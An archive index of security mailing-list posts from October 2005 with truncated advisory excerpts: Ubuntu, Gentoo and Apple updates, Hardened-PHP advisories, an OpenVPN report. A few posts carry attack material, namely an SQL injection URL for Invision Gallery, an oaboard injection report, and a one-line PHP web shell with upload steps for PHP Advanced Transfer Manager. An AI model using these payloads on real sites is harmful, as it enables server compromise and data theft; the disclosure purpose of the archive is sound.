[USN-206-2] Fixed lynx packages for USN-206-1

2005-10-31 Thread Martin Pitt
=== Ubuntu Security Notice USN-206-2 October 29, 2005 lynx regression fix === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04

[USN-213-1] sudo vulnerability

2005-10-31 Thread Martin Pitt
=== Ubuntu Security Notice USN-213-1 October 28, 2005 sudo vulnerability CVE-2005-2959 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog)

[USN-151-3] zlib vulnerabilities

2005-10-31 Thread Martin Pitt
=== Ubuntu Security Notice USN-151-3 October 28, 2005 aide vulnerabilities CVE-2005-1849, CVE-2005-2096 === A security issue affects the following Ubuntu releases: Ubuntu

New List

2005-10-31 Thread David Ahmad
Objective The primary objective of the Beta-Announce list is to provide the SecurityFocus community access to upcoming security tool and product beta trials. In the same vein it will provide access to tool authors and vendors to announce their beta programs and get valuable feedback from the

[USN-212-1] libgda2 vulnerability

2005-10-31 Thread Martin Pitt
=== Ubuntu Security Notice USN-212-1 October 28, 2005 libgda2 vulnerability CAN-2005-2958 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty

Advisory 20/2005: PHP File-Upload $GLOBALS Overwrite Vulnerability

2005-10-31 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: PHP File-Upload $GLOBALS Overwrite Vulnerability Release Date: 2005/10/31 Last Modified:

Advisory 19/2005: PHP register_globals Activation Vulnerability in parse_str()

2005-10-31 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: PHP register_globals Activation Vulnerability in parse_str() Release Date: 2005/10/31 Last

Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()

2005-10-31 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo() Release Date: 2005/10/31 Last

OpenVPN[v2.0.x]: foreign_option() formart string vulnerability.

2005-10-31 Thread v9
[EMAIL PROTECTED]: OpenVPN[v2.0.x]: foreign_option() format string vulnerability. 1. BACKGROUND OpenVPN is a robust and highly configurable VPN (Virtual Private Network) daemon which can be used to securely link two or more private networks using an encrypted tunnel over the Internet.

Advisory 17/2005: phpBB Multiple Vulnerabilities

2005-10-31 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: phpBB Multiple Vulnerabilities Release Date: 2005/10/31 Last Modified: 2005/10/31

[ GLSA 200510-26 ] XLI, Xloadimage: Buffer overflow

2005-10-31 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200510-26 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - -

SQL In Invision Gallery 2.0.3

2005-10-31 Thread almaster
Credit: By aLMaSTeR HaCKeR [ [EMAIL PROTECTED] Vulnerable: Invision Gallery 2.0.3 EXPLIOT: http://www.site.com/index.php?automodule=gallerycmd=sccat=26sort_key=dateorder_key=DESCprune_key=30st=|aLMaSTeR The Error: mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid,

mwcollect v3.0.0 Release

2005-10-31 Thread Georg Wicherski
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The Honeynet Project and Research Alliance are pleased to announce the release of mwcollect v3.0.0 on http://www.mwcollect.org/ . What's new? The core has been completly rewritten. It is now even more modularized and has prooven to be very stable.

SQL IN FORUM.PHP

2005-10-31 Thread ABDUCTER_MINDS
Class: Input Validation Error CVE: CVE-MAP-NOMATCH Remote: Yes Discovered BY ABDUCTER Expliot BY DEVIL-00 [EMAIL PROTECTED] (OR) [EMAIL PROTECTED] Vulnerable:powered by oaboard 1.0 // info:- FOR INFORMATION VISIT

Re: uplod phpshell in PHP Advanced Transfer Manager

2005-10-31 Thread D_BuG
Read link =) http://www.securityfocus.com/bid/13542/exploit This old bug ;) Good luke discovered! uplod phpshell in PHP Advanced Transfer Manager one save as the code : pre ? passthru($_GET['sQl']); ? file save as sQl.php.ns now upload in the PHP Advanced

APPLE-SA-2005-10-31 Mac OS X v10.4.3

2005-10-31 Thread noreply
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 APPLE-SA-2005-10-31 Mac OS X v10.4.3 Mac OS X v10.4.3 and Mac OS X Server v10.4.3 are now available and deliver the following security enhancements: Finder CVE-ID: CVE-2005-2749 Available for: Mac OS X v10.4.2, Mac OS X Server v10.4.2 Impact: